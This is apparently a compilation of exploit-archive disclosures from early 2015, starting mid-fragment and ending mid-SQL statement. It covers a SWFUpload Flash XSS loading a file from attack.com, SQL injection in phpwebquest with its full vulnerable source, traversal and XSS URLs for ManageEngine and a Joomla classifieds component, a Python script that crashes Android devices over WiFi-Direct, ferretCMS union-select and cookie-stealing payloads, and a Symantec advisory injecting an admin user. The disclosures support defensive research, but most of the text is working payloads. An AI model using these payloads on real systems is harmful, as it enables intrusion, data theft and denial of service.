ExternalInterface.addCallback("SetButtonText",this.SetButtonText);
SetButtonText
{
this.SetButtonText(String(root.loaderInfo.parameters.buttonText));
}
catch(ex:Object)
{
this.SetButtonText("");
}
try
{
#POC
http://victim.com/swfupload.swf?buttonTextStyle=http://attack.com/Exploiting.swf
# Exploit Title: sql injection
# Google Dork: inurl:webquest/soporte_horizontal_w.php?id_actividad=
# Date: [24/01/2015]
# Exploit Author: [jord4nroo7] anonjo@aol.com
# Vendor Homepage: [http://phpwebquest.org]
# Software Link: [http://phpwebquest.org/?page_id=14]
# Version: [phpwebquest-2.6]
# Tested on: [windows 8.1]
#Exploit: sql inhection found on phpwebquest script version 2.6
#
#example http://localhost/phpwq/webquest/soporte_horizontal_w.php?id_actividad=184&id_pagina=1%27'
#---------------------------
if ($_GET['id_actividad']!=''){
$id_actividad=$_GET['id_actividad'];--------->sqlinjection here
}else{
$id_actividad='1500000';
}
if ($_GET['id_pagina']!=''){
$id_pagina=$_GET['id_pagina'];
}else{
$id_pagina='1';
$texto_actual=$texto_alternativo;
$imagen_actual='../imagenes/no_imagen.gif';
}
#----------------------------
<?
session_cache_limiter('nocache,private');
session_start();
session_set_cookie_params(0, "/", $HTTP_SERVER_VARS["HTTP_HOST"], 0);
include("../include/mysql.php");
include("../include/idioma.php");
$base=$mysql_db;
$c=mysql_connect($mysql_server,$mysql_login,$mysql_pass);
mysql_select_db ($base, $c);
#para solucionar un problema que se plantea cuando los usuarios crean la actividad pero no crean páginas
if ($_GET['id_actividad']!=''){
$id_actividad=$_GET['id_actividad'];
}else{
$id_actividad='1500000';
}
if ($_GET['id_pagina']!=''){
$id_pagina=$_GET['id_pagina'];
}else{
$id_pagina='1';
$texto_actual=$texto_alternativo;
$imagen_actual='../imagenes/no_imagen.gif';
}
#echo "PAGINA DEL GET:".$id_pagina."<br>";
#echo "PAGINA DEL GET:".$id_pagina."<br>";
$sentencia= "SELECT * FROM actividad WHERE id_actividad=".$id_actividad;
$resultado=mysql_query($sentencia);
while($v=mysql_fetch_array($resultado)){
foreach ($v as $indice=>$valor){
if(!is_int($indice)){
# echo $indice.":".$valor."<br>";
$campo[$indice]=$valor;
}
}
}
$sentencia="select * from pagina where id_actividad=".$id_actividad." order by num_pagina asc";
$resultado=mysql_query($sentencia);
$j=1;
while($v=mysql_fetch_array($resultado)){
foreach ($v as $indice=>$valor){
if(!is_int($indice)){
#echo $indice.":".$valor."<br>";
$campo[$j][$indice]=$valor;
}
}
$j++;
}
for ($cont=1; $cont<=5; $cont++){
if ($campo[$cont]['num_pagina']==$id_pagina){
$texto_actual=$campo[$cont]['texto'];
$imagen_actual=$campo[$cont]['imagen'];
}
}
$resta=0;
$tamano_enlaces=$campo['font_size'] - $resta ;
$tamano_titulo=$campo['font_size'];
#echo $tamano_titulo;
?>
<html>
<head>
<title>PHP Webquest</title>
<!-- Webquest elaborada con PHP Webquest http://www.phpwebquest.org
Programa elaborado por Antonio Temprano bajo Licencia GPL
Puede ser utilizado gratuitamente por quien quiera hacerlo con fines
educativos y con la obligación de no quitar estas líneas de código
-->
<style>
table {
font-family : <? echo $campo['font_face'];?>;
font-size : <? echo $campo['font_size'];?>;
font-weight : normal;
color: <? echo $campo['color_texto_principal'];?>;
}
a {
font-family : <? echo $campo['font_face'];?>;
font-size : <? echo $campo['font_size'];?>;
text-decoration: none;
color: <? echo $campo['color_enlaces'];?>;
font-weight : normal;
}
a:hover {
position: relative;
top: 1px;
left: 1px;
font-family : <? echo $campo['font_face'];?>;
font-size : <? echo $campo['font_size'];?>;
text-decoration: none;
color: <? echo $campo['color_enlaces_resaltados'];?>;
font-weight : normal;
}
div.phpwebquest { font-size : 7.5pt;}
div.phpwebquest a:link { font-size : 7.5pt;}
div.phpwebquest a:hover { font-size : 7.5pt;}
div.phpwebquest a { font-size : 7.5pt;};
</style>
</head>
<body bgcolor="<? echo $campo['color_fondo_pagina'];?>">
<div align="center">
<table width="750" border="0" cellpadding="0" cellspacing="1" bgcolor="<? echo $campo['color_cuadro_pagina'];?>">
<tr>
<td><div align="center">
<table width="100%" border="0" cellpadding="0" cellspacing="1" bgcolor="<? echo $campo['color_cuadro_texto'];?>">
<tr>
<td><table width="100%" border="0" cellspacing="1" cellpadding="0">
<tr>
<td height="50"><div valign="middle" align="center"><h1><font color="<? echo $campo['color_texto_titulo'];?>"><? echo $campo['titulo'];?></font></h1></div></td>
</tr>
<tr>
<? if ($id_pagina==1){
$titular=$introduccion;
}elseif($id_pagina==2){
$titular=$tareas;
}elseif($id_pagina==3){
$titular=$proceso;
}elseif($id_pagina==4){
$titular=$evaluacion;
}else{
$titular=$conclusiones;
}
?>
<td height="50" bgcolor="<? echo $campo['color_cuadro_pagina'];?>"><font color="<? echo $campo['color_texto_tipo'];?>"><div valign="middle" align="center"><h3><? echo $titular;?></h3></div></font></td>
</tr>
<tr>
<td><table width="100%" border="0" cellspacing="1" cellpadding="0">
<tr>
<td width="81%" valign="top"><table width="100%" height="141" border="0" cellpadding="0" cellspacing="1">
<tr>
<td width="1%" height="139"> </td>
<td width="97%" valign="middle"><div align="left">
<table width="100%" height="134" border="0" cellpadding="0" cellspacing="1">
<tr>
<td width="1%" valign="top"><div align="left"><img src="<? echo $imagen_actual;?>"></div></td>
<td width="2%"> </td>
<td width="97%"><? echo $texto_actual;?><br>
<table align=center width="80%" border=0 bgcolor="<? echo $campo['color_cuadro_menu'];?>">
<? if ($id_pagina==3){
echo '<tr></tr>';
$sentencia="select url, descripcion from url where id_actividad=".$id_actividad;
$resultado=mysql_query($sentencia);
$j=1;
while($v=mysql_fetch_array($resultado)){
foreach ($v as $indice=>$valor){
if(!is_int($indice)){
if($indice=='url'){
echo '<tr><td><div class="celdamenu"><a href='.$valor.' target="_blank"></div>';
}else{
echo $valor."</td></tr>";
}
$url[$j][$indice]=$valor;
}
}
$j++;
}
}
mysql_close($c);
?>
</table>
</td>
</tr>
</table>
</div></td>
<td width="2%"> </td>
</tr>
</table></td>
<td width="15%" valign="top">
<table width="100%" border="0" cellspacing="1" cellpadding="0" bgcolor="<? echo $campo['color_cuadro_texto'];?>" bordercolor="#FFFFFF"><tr><td> </td></tr></table>
<table width="100%" border="0" cellspacing="1" cellpadding="0" bgcolor="<? echo $campo['color_cuadro_menu'];?>" bordercolor="#FFFFFF">
<tr>
<td><div align="left"><a href="soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad']."&id_pagina=1"; ?>"> <? echo $enlace_introduccion; ?></a></div></td>
</tr>
<tr>
<td height="1" bgcolor="#FFFFFF"></td>
</tr>
<tr>
<td><div align="left"><a href="soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad']."&id_pagina=2"; ?>"> <? echo $enlace_tareas; ?></a></div></td>
</tr>
<tr>
<td height="1" bgcolor="#FFFFFF"></td>
</tr>
<tr>
<td><div align="left"><a href="soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad']."&id_pagina=3"; ?>"> <? echo $enlace_proceso; ?></a></font></div></td>
</tr>
<tr>
<td height="1" bgcolor="#FFFFFF"></td>
</tr>
<tr>
<td><div align="left"><a href="soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad']."&id_pagina=4"; ?>"> <? echo $enlace_evaluacion; ?></a></font></div></td>
</tr>
<tr>
<td height="1" bgcolor="#FFFFFF"></td>
</tr>
<tr>
<td><div align="left"><a href="soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad']."&id_pagina=5"; ?>"> <? echo $enlace_conclusiones; ?></a></font></div></td>
</tr>
</table></td>
</tr>
</table></td>
</tr>
</table></td>
</tr>
<tr>
<td height="19">
<table width="100%" border="0" cellspacing="1" cellpadding="0">
<tr>
<td width="55%"><div class="phpwebquest" align="right"><? echo $elaborada; ?> <? echo $campo['autor'];?> <? echo $con; ?></div></td>
<td width="45%"><div class="phpwebquest" align="left"><a href="http://www.phpwebquest.org"> PHPWebquest</a></div></td>
</tr>
</table>
</td>
</tr>
</table>
</div></td>
</tr>
</table>
</div>
</body>
</html>
#greetz to all my friends ,balawi,ro3ob hr ,mothana-X , sharingan jo , and anonymous jo , and all muslim hackers
################################################################################################
# #
# ...:::::ManageEngine EventLog Analyzer Directory Traversal/XSS Vulnerabilities::::.... #
# #############################################################################################
Sobhan System Network & Security Group (sobhansys)
-------------------------------------------------------
# Date: 2015-01-24
# Exploit Author: AmirHadi Yazdani (Sobhansys Co)
# Vendor Homepage: http://www.manageengine.com/products/eventlog/
# Demo Link: http://demo.eventloganalyzer.com/event/index3.do
#Affected version: <= Build Version : 9.0
About ManageEngine EventLog Analyzer (From Vendor Site) :
EventLog Analyzer provides the most cost-effective Security Information and Event Management (SIEM) software on the market.
Using this Log Analyzer software, organizations can automate
the entire process of managing terabytes of machine generated logs by collecting, analyzing, correlating, searching, reporting,
and archiving from one central location.
This event log analyzer software helps to monitor file integrity, conduct log forensics analysis,
monitor privileged users and comply to different compliance regulatory bodies
by intelligently analyzing your logs and instantly generating a variety of reports like user activity reports, historical trend reports, and more.
--------------------------------------------------------
I'M hadihadi From Virangar Security Team
special tnx to:MR.nosrati,black.shadowes,MR.hesy
& all virangar members & all hackerz
greetz to My friends In Signal IT Group (www.signal-net.net) & A.Molaei
spl:Z.Khodaee
-------
exploit:
Diretory Traversal :
http://127.0.0.1/event/index2.do?helpP=userReport&overview=true&tab=report&url=../../WEB-INF/web.xml%3f
http://127.0.0.1/event/index2.do?completeData=true&helpP=archiveAction&tab=system&url=../../WEB-INF/web.xml%3f
http://127.0.0.1/event/index2.do?helpP=fim&link=0&sel=13&tab=system&url=../../WEB-INF/web.xml%3f
XSS :
http://127.0.0.1/event/index2.do?helpP=userReport&overview=true&tab=report&url=userReport'%22()%26%25<ahy><ScRiPt%20>prompt(915375)</ScRiPt>
http://127.0.0.1/event/index2.do?helpP=fim&link=0&sel=13'%22()%26%25<ahy><ScRiPt%20>prompt(978138)</ScRiPt>&tab=system&url=ConfigureTemplate
----
Sobhan system Co.
Signal Network And Security Group (www.signal-net.net)
E-mail: amirhadi.yazdani@gmail.com,a.h.yazdani@signal-net.net
# Exploit Title: jclassifiedsmanager Multiple Vulnerabilities
# Google Dork: inurl:com_jclassifiedsmanager
# Date: 26 Jan 2015
# Exploit Author: Sarath Nair aka AceNeon13
# Contact: @AceNeon13
# Greetings: HariKrishnan, Raj3sh.tv, Deepu.tv
# Vendor Homepage: cmsjunkie.com
# Software Link: http://www.cmsjunkie.com/classifieds-manager
# PoC Exploit: SQL Injection
--------------------------------
http://localhost/jclassifiedsmanager/classifieds/offerring-ads?controller=displayads&view=displayads&task=viewad&id=[SQL Injection Here]
"id" parameter is not sanitized.
# PoC Exploit: XSS Reflected
--------------------------------
http://localhost/jclassifiedsmanager/classifieds?view=displayads7ed3b"onload%3d"alert(1)"87d4d&layout=offerring&controller=displayads&adtype=1
"view" parameter is not sanitized.
########################################
# Vulnerability Disclosure Timeline:
2014-Dec-11: Discovered vulnerability
2014-Dec-12: Vendor Notification
2014-Dec-12: Vendor Response/Feedback
2015-Jan-19: Vendor Fix/Patch
2015-Jan-26: Public Disclosure
#######################################
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/
Android WiFi-Direct Denial of Service
1. *Advisory Information*
Title: Android WiFi-Direct Denial of Service
Advisory ID: CORE-2015-0002
Advisory URL:
http://www.coresecurity.com/advisories/android-wifi-direct-denial-service
Date published: 2015-01-26
Date of last update: 2015-01-26
Vendors contacted: Android Security Team
Release mode: User release
2. *Vulnerability Information*
Class: Uncaught Exception [CWE-248]
Impact: Denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2014-0997
3. *Vulnerability Description*
Some Android devices are affected by a Denial of Service attack when
scanning for WiFi Direct devices.
An attacker could send a specially crafted 802.11 Probe Response frame
causing the Dalvik subsystem to reboot because of an Unhandle Exception
on WiFiMonitor class.
4. *Vulnerable Packages*
. Nexus 5 - Android 4.4.4
. Nexus 4 - Android 4.4.4
. LG D806 - Android 4.2.2
. Samsung SM-T310 - Android 4.2.2
. Motorola RAZR HD - Android 4.1.2
Other devices could be also affected.
5. *Non-vulnerable packages*
. Android 5.0.1
. Android 5.0.2
6. *Vendor Information, Solutions and Workarounds*
Some mitigation actions may be to avoid using WiFi-Direct or update
to a non-vulnerable Android version.
Contact vendor for further information.
7. *Credits*
This vulnerability was discovered and researched by Andres Blanco
from the CoreLabs
Team. The publication of this advisory was coordinated by the Core
Advisories
Team.
8. *Technical Description / Proof of Concept Code*
Android makes use of a modified *wpa_supplicant*[1]
in order to provide an interface between the wireless driver and the
Android platform framework.
Below the function that handles *wpa_supplicant* events. This function
returns a jstring from calling NewStringUTF method.
/-----
static jstring android_net_wifi_waitForEvent(JNIEnv* env, jobject)
{
char buf[EVENT_BUF_SIZE];
int nread = ::wifi_wait_for_event(buf, sizeof buf);
if (nread > 0) {
return env->NewStringUTF(buf);
} else {
return NULL;
}
}
-----/
The WiFi-Direct specification defines the P2P discovery procedure to
enable P2P
devices to exchange device information, the device name is part of
this information.
The WifiP2pDevice class, located at
/wifi/java/android/net/wifi/p2p/WifiP2pDevice.java,
represents a Wi-Fi p2p device. The constructor method receives the
string provided by
the *wpa_supplicant* and throws an IllegalArgumentException in case
the event is malformed.
Below partial content of the WiFiP2PDevice.java file.
/-----
[...]
/** Detailed device string pattern with WFD info
* Example:
* P2P-DEVICE-FOUND 00:18:6b:de:a3:6e
p2p_dev_addr=00:18:6b:de:a3:6e
* pri_dev_type=1-0050F204-1 name='DWD-300-DEA36E'
config_methods=0x188
* dev_capab=0x21 group_capab=0x9
*/
private static final Pattern detailedDevicePattern =
Pattern.compile(
"((?:[0-9a-f]{2}:){5}[0-9a-f]{2}) " +
"(\\d+ )?" +
"p2p_dev_addr=((?:[0-9a-f]{2}:){5}[0-9a-f]{2}) " +
"pri_dev_type=(\\d+-[0-9a-fA-F]+-\\d+) " +
"name='(.*)' " +
"config_methods=(0x[0-9a-fA-F]+) " +
"dev_capab=(0x[0-9a-fA-F]+) " +
"group_capab=(0x[0-9a-fA-F]+)" +
"( wfd_dev_info=0x000006([0-9a-fA-F]{12}))?"
);
[...]
/**
* @param string formats supported include
* P2P-DEVICE-FOUND fa:7b:7a:42:02:13
p2p_dev_addr=fa:7b:7a:42:02:13
* pri_dev_type=1-0050F204-1 name='p2p-TEST1'
config_methods=0x188 dev_capab=0x27
* group_capab=0x0 wfd_dev_info=000006015d022a0032
*
* P2P-DEVICE-LOST p2p_dev_addr=fa:7b:7a:42:02:13
*
* AP-STA-CONNECTED 42:fc:89:a8:96:09
[p2p_dev_addr=02:90:4c:a0:92:54]
*
* AP-STA-DISCONNECTED 42:fc:89:a8:96:09
[p2p_dev_addr=02:90:4c:a0:92:54]
*
* fa:7b:7a:42:02:13
*
* Note: The events formats can be looked up in the
wpa_supplicant code
* @hide
*/
public WifiP2pDevice(String string) throws
IllegalArgumentException {
String[] tokens = string.split("[ \n]");
Matcher match;
if (tokens.length < 1) {
throw new IllegalArgumentException("Malformed supplicant
event");
}
switch (tokens.length) {
case 1:
/* Just a device address */
deviceAddress = string;
return;
case 2:
match = twoTokenPattern.matcher(string);
if (!match.find()) {
throw new IllegalArgumentException("Malformed
supplicant event");
}
deviceAddress = match.group(2);
return;
case 3:
match = threeTokenPattern.matcher(string);
if (!match.find()) {
throw new IllegalArgumentException("Malformed
supplicant event");
}
deviceAddress = match.group(1);
return;
default:
match = detailedDevicePattern.matcher(string);
if (!match.find()) {
throw new IllegalArgumentException("Malformed
supplicant event");
}
deviceAddress = match.group(3);
primaryDeviceType = match.group(4);
deviceName = match.group(5);
wpsConfigMethodsSupported = parseHex(match.group(6));
deviceCapability = parseHex(match.group(7));
groupCapability = parseHex(match.group(8));
if (match.group(9) != null) {
String str = match.group(10);
wfdInfo = new
WifiP2pWfdInfo(parseHex(str.substring(0,4)),
parseHex(str.substring(4,8)),
parseHex(str.substring(8,12)));
}
break;
}
if (tokens[0].startsWith("P2P-DEVICE-FOUND")) {
status = AVAILABLE;
}
}
[...]
-----/
On some Android devices when processing a probe response frame with a
WiFi-Direct(P2P)
information element that contains a device name attribute with
specific bytes generates
a malformed supplicant event string that ends up throwing the
IllegalArgumentException.
As this exception is not handled the Android system restarts.
Below partial content of the logcat of a Samsung SM-T310 running
Android 4.2.2.
/-----
I/p2p_supplicant( 2832): P2P-DEVICE-FOUND 00.EF.00
p2p_dev_addr=00.EF.00 pri_dev_type=10-0050F204-5 'fa¬¬'
config_methods=0x188 dev_capab=0x21 group_capab=0x0
E/AndroidRuntime( 2129): !@*** FATAL EXCEPTION IN SYSTEM PROCESS:
WifiMonitor
E/AndroidRuntime( 2129): java.lang.IllegalArgumentException:
Malformed supplicant event
E/AndroidRuntime( 2129): at
android.net.wifi.p2p.WifiP2pDevice.<init>(WifiP2pDevice.java:229)
E/AndroidRuntime( 2129): at
android.net.wifi.WifiMonitor$MonitorThread.handleP2pEvents(WifiMonitor.java:966)
E/AndroidRuntime( 2129): at
android.net.wifi.WifiMonitor$MonitorThread.run(WifiMonitor.java:574)
E/android.os.Debug( 2129): !@Dumpstate > dumpstate -k -t -z -d -o
/data/log/dumpstate_sys_error
-----/
8.1. *Proof of Concept*
This PoC was implemented using the open source library Lorcon
[2] and PyLorcon2 [3], a Python wrapper for the Lorcon library.
/-----
#!/usr/bin/env python
import sys
import time
import struct
import PyLorcon2
def get_probe_response(source, destination, channel):
frame = str()
frame += "\x50\x00" # Frame Control
frame += "\x00\x00" # Duration
frame += destination
frame += source
frame += source
frame += "\x00\x00" # Sequence Control
frame += "\x00\x00\x00\x00\x00\x00\x00\x00" # Timestamp
frame += "\x64\x00" # Beacon Interval
frame += "\x30\x04" # Capabilities Information
# SSID IE
frame += "\x00"
frame += "\x07"
frame += "DIRECT-"
# Supported Rates
frame += "\x01"
frame += "\x08"
frame += "\x8C\x12\x98\x24\xB0\x48\x60\x6C"
# DS Parameter Set
frame += "\x03"
frame += "\x01"
frame += struct.pack("B", channel)
# P2P
frame += "\xDD"
frame += "\x27"
frame += "\x50\x6F\x9A"
frame += "\x09"
# P2P Capabilities
frame += "\x02" # ID
frame += "\x02\x00" # Length
frame += "\x21\x00"
# P2P Device Info
frame += "\x0D" # ID
frame += "\x1B\x00" # Length
frame += source
frame += "\x01\x88"
frame += "\x00\x0A\x00\x50\xF2\x04\x00\x05"
frame += "\x00"
frame += "\x10\x11"
frame += "\x00\x06"
frame += "fafa\xFA\xFA"
return frame
def str_to_mac(address):
return "".join(map(lambda i: chr(int(i, 16)), address.split(":")))
if __name__ == "__main__":
if len(sys.argv) != 3:
print "Usage:"
print " poc.py <iface> <target>"
print "Example:"
print " poc.py wlan0 00:11:22:33:44:55"
sys.exit(-1)
iface = sys.argv[1]
destination = str_to_mac(sys.argv[2])
context = PyLorcon2.Context(iface)
context.open_injmon()
channel = 1
source = str_to_mac("00:11:22:33:44:55")
frame = get_probe_response(source, destination, channel)
print "Injecting PoC."
for i in range(100):
context.send_bytes(frame)
time.sleep(0.100)
-----/
9. *Report Timeline*
. 2014-09-26:
Core Security contacts Android security team to inform them that
a vulnerability has been found in Android. Core Security sends a draft
advisory with technical details and PoC files.
. 2014-09-29:
Android Security Team acknowledges reception of the advisory.
. 2014-09-30:
Core Security notifies that the tentative publication date is
set for Oct 20rd, 2014.
. 2014-09-30:
Android Security Team acknowledges.
. 2014-10-16:
Core Security requests a status update.
. 2014-10-16:
Android Security Team responds that they have classify the
vulnerability as low severity and don't currently have a timeline for
releasing a fix.
. 2014-10-20:
Core Security does not completely agrees with the vulnerability
classification and reschedule the publication of the advisory.
. 2014-10-16:
Android Security Team acknowledges and strengthens it's position
that they don't currently have a timeline for releasing a fix.
. 2015-01-06:
Core Security requests a status update.
. 2015-01-12:
Core Security asks for confirmation of reception of the previous
email.
. 2015-01-16:
Android Security Team acknowledges and respond that they don't
currently have a timeline for releasing a fix.
. 2015-01-19:
Core Security notifies that vendor cooperation is needed in
order to keep this process coordinated. If vendor refuses to provide the
requested information the advisory will be released tagged as 'user
release'. The advisory is re-scheduled for January 26th, 2015.
. 2015-01-20:
Android Security Team acknowledges and respond that they don't
currently have a timeline for releasing a fix.
. 2015-01-26:
The advisory CORE-2015-0002 is published.
10. *References*
[1] - wpa_supplicant site. http://w1.fi/wpa_supplicant/
[2] - Lorcon site. https://code.google.com/p/lorcon
[3] - PyLorcon2 site. http://code.google.com/p/pylorcon2
11. *About CoreLabs*
CoreLabs, the research center of Core Security, is charged with
anticipating
the future needs and requirements for information security technologies.
We conduct our research in several important areas of computer security
including system vulnerabilities, cyber attack planning and simulation,
source code auditing, and cryptography. Our results include problem
formalization, identification of vulnerabilities, novel solutions and
prototypes for new technologies. CoreLabs regularly publishes security
advisories, technical papers, project information and shared software
tools for public use at:
http://corelabs.coresecurity.com.
12. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright
(c) 2014 Core Security and (c) 2014 CoreLabs,
and are licensed under a Creative Commons
Attribution Non-Commercial Share-Alike 3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
Advisory:
Advisory ID: SROEADV-2015-10
Author: Steffen Rösemann
Affected Software: ferretCMS v. 1.0.4-alpha
Vendor URL: https://github.com/JRogaishio/ferretCMS
Vendor Status: vendor will patch eventually
CVE-ID: -
Tested on:
- Firefox 35, Iceweasel 31
- Mac OS X 10.10, Kali Linux 1.0.9a
==========================
Vulnerability Description:
==========================
The content management system ferretCMS v.1.0.4, which is currently in
alpha development stage, suffers from multiple stored/reflecting XSS- and
SQLi-vulnerabilities in its administrative backend.
Moreover, there exists the possibility to upload arbitrary files via the
administrative backend, which can be executed by unauthenticated users, too.
==================
Technical Details:
==================
A reflecting XSS vulnerability can be found in the parameter "action" used
in the file admin.php:
http://
{TARGET}/admin.php?type=search&action=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
Stored XSS vulnerabilities resides in the logging functionality of
ferretCMS. On the administrative backend, the administrator has the
opportunity to watch events stored in a log. An event, that gets logged,
are login-attempts to the administrative backend, where the used username
is displayed, too. An attacker can abuse this, by trying to log in with
JavaScript-code instead of a username. That code gets executed in the logs.
Login-form is located here: http://{TARGET}/admin.php
XSS gets executed here: http://{TARGET}/admin.php?type=log&action=read
Another stored XSS vulnerability can be found in the pagetitle of a new
blog entry that is created by the administrator:
vulnerable form: http://{TARGET}/admin.php?type=page&action=insert&p=
XSS gets executed here: http://{TARGET}/admin.php?type=page&action=read
The following URLs are prone to SQL injection attacks:
http://
{TARGET}/admin.php?type=site&action=update&p=1+and+1=2+union+select+1,version%28%29,3,4+--+
http://
{TARGET}/admin.php?type=customkey&action=update&p=1+and+1=2+union+select+1,version%28%29,database%28%29,4+--+
http://
{TARGET}/admin.php?type=account&action=update&p=1+and+1=2+union+select+1,database%28%29,3,4,5,version%28%29,7,8,9+--+
http://
{TARGET}/admin.php?type=plugin&action=update&p=1+and+1=2+union+select+1,database%28%29,version%28%29,4+--+
http://
{TARGET}/admin.php?type=template&action=update&p=1+and+1=2+union+select+1,version%28%29,database%28%29,user%28%29,5+--+
http://
{TARGET}/admin.php?type=permissiongroup&action=update&p=1+and+1=2+union+select+1,version%28%29,3,4+--+
http://
{TARGET}/admin.php?type=page&action=update&p=1+and+substring%28version%28%29,1,1%29=5+--+
Last but not least there is a file-upload functionality in the
administrative backend of ferretCMS. The administrator can upload arbitrary
files here via the following URL:
http://localhost/ferretCMS/admin.php?type=uploader&action=upload
Any unauthenticated user can execute/read those files that had been
uploaded by visiting the following URL:
http://{TARGET}/custom/uploads/{NAME_OF_THE_UPLOADED_FILE}
=========
Solution:
=========
Vendor responded, issues will be patched eventually.
====================
Disclosure Timeline:
====================
15/16-Jan-2015 – found the vulnerability
16-Jan-2015 - informed the developers (see [3])
16-Jan-2015 – release date of this security advisory [without technical
details]
21-Jan-2015 - attempt #2 to inform the developer via mail
22-Jan-2015 - vendor responded, technical details posted to Github (see [3])
22-Jan-2015 - release date of this security advisory
22-Jan-2015 - send to lists
========
Credits:
========
Vulnerability found and advisory written by Steffen Rösemann.
===========
References:
===========
[1] https://github.com/JRogaishio/ferretCMS
[2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-10.html
[3] https://github.com/JRogaishio/ferretCMS/issues/63
[4] https://github.com/sroesemann/ferretCMS
SEC Consult Vulnerability Lab Security Advisory < 20150122-0 >
=======================================================================
title: Multiple critical vulnerabilities
products: Symantec Data Center Security: Server Advanced (SDCS:SA)
Symantec Critical System Protection (SCSP)
vulnerable version: see: Vulnerable / tested versions
fixed version: SCSP 5.2.9 MP6, SDCS:SA 6.0 MP1 - not all
vulnerabilities were fixed, but mitigations exist
impact: Critical
CVE number: CVE-2014-7289, CVE-2014-9224, CVE-2014-9225, CVE-2014-9226
homepage: http://www.symantec.com
found: 2014-09-19
by: Stefan Viehböck
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"Symantec Data Center Security: Server Advanced v6.0 (DCS: Server Advanced)
extends the Data Center Security: Server solution beyond agentless threat
protections by incorporating technologies previous known as Critical System
Protection. Data Center Security: Server Advanced provides granular, policy-
based controls with a low impact in-guest agent to monitor and protect numerous
physical and virtual server environments. Through a combination of technologies
including application-centric controls including protected white listing,
sandboxing using least privilege access controls, host-based intrusion detection
(HIDS) and prevention (HIPS), and real-time file integrity monitoring (FIM),
organizations can proactively safeguard their heterogeneous server environments
and the information they contain from zero-day and targeted attacks, and fulfill
their compliance mandates across critical systems. Click here for more info"
Source:
http://www.symantec.com/connect/forums/announcing-data-center-security-server-server-advanced-products
Business recommendation:
------------------------
Attackers are able to completely compromise the SDCS:SA Server as they can gain
access at the system and database level. Furthermore attackers can manage all
clients and their policies.
SDCS:SA Server can be used as an entry point into the target infrastructure
(lateral movement, privilege escalation).
Furthermore the SDCS:SA Client protections can be bypassed in several ways.
It is highly recommended by SEC Consult not to use this software until a
thorough security review (SDCS:SA Server, SDCS:SA Client Policies) has been
performed by security professionals and all identified issues have been
resolved.
Note: SDCS:SA was replaced by SCSP. In this document the name SDCS:SA is used.
Vulnerability overview/description:
-----------------------------------
1) Unauthenticated SQL Injection (SDCS:SA Server) (CVE-2014-7289)
Due to insufficient input validation, the application allows the injection
of direct SQL commands. By exploiting the vulnerability, an attacker gains
access (read/write) to all records stored in the database as arbitrary SQL
statements can be executed.
Furthermore the application design enables an attacker to gain code execution
as SYSTEM (highest privilege Windows user) on the server by exploiting this
vulnerability.
No prior authentication is needed to exploit this vulnerability.
Affected script:
https://<host>:4443/sis-ui/authenticate
2) Reflected Cross-Site-Scripting (XSS) (SDCS:SA Server) (CVE-2014-9224)
The applications suffers from a reflected cross-site scripting vulnerability,
which allows an attacker to steal other users' sessions, to impersonate other
users and to gain unauthorized access to the admin interface.
Affected scripts:
https://<host>:8081/webui/Khaki_docs/SSO-Error.jsp
https://<host>:8081/webui/admin/WCUnsupportedClass.jsp
3) Information Disclosure (SDCS:SA Server) (CVE-2014-9225)
A script discloses internal information about the application on the server
without prior authentication. This information includes file paths on the
webserver, version information (OS, Java) and is accessible without prior
authentication.
Affected script:
https://<host>:8081/webui/admin/environment.jsp
4) Multiple Default Security Protection Policy Bypasses (SDCS:SA Client)
(CVE-2014-9226)
Several bypasses were discovered. These require Windows Administrator
permissions. This requirement is usually met in SDCS:SA deployments.
Note: SEC Consult did not check whether the mitigations provided by Symantec do
in fact sufficiently mitigate these vulnerabilities!
- Persistent code execution via Windows Services
The default Symantec policy rules can be bypassed in order to get persistent
arbitrary code execution.
- Remote code execution via RPC
The default Symantec policy rules can be bypassed in order to get persistent
arbitrary code execution. In addition to that "psexec-style" remote code
execution via SMB is possible as well.
- Policy bypass: Extraction of Windows passwords/hashes
The default Symantec policy rules do not prevent attackers from extracting
the Windows passwords/password hashes from the System.
- Privilege elevation via Windows Installer (msiexec.exe)
The restrictions imposed by the default policies can be bypassed entirely by
exploiting incorrect assumptions made in the policy regarding the Windows
Installer (msiexec.exe).
- Privilege elevation/code execution via Windows Management Instrumentation
(.mof files)
The restrictions imposed by default policies can be bypassed partially by
exploiting incorrect assumptions made in the policy regarding the Windows
Management Instrumentation. The policy does not take intended OS functionality
to execute code into account.
Proof of concept:
-----------------
1) Unauthenticated SQL Injection (SDCS:SA Server) (CVE-2014-7289)
The servlet accessible via /sis-ui/authenticate (TCP port 4443, HTTPS) is
vulnerable to SQL injection. By sending a specially crafted HTTP request,
arbitrary SQL statements can be executed.
In a proof of concept exploit, SQL statements to add a new SDCS:SA user with
admin privileges (username: secconsult, password: PASSWORD123!) were executed.
These statements are:
INSERT INTO USR (RID, USERNAME, PWD, CONTACT_NAME, PHONES, EMAIL, ALERT_EMAIL,
ADDRESS, MANAGER_NAME, BUSINESS_INFO, PREF_LANGUAGE, FLAGS, DESCR, CREATETIME,
MODTIME, ENABLED, BUILTIN, HIDDEN, SALT) VALUES (1504, 'secconsult',
'DUjDkNZgv9ys9/Sj/FQwYmP29JBtGy6ZvuZn2kAZxXc=',
'', '', '', '', '', '', '', '', NULL, 'SECCONSULT', '2014-09-12 07:13:09',
'2014-09-12 07:13:23', '1', '0', '0',
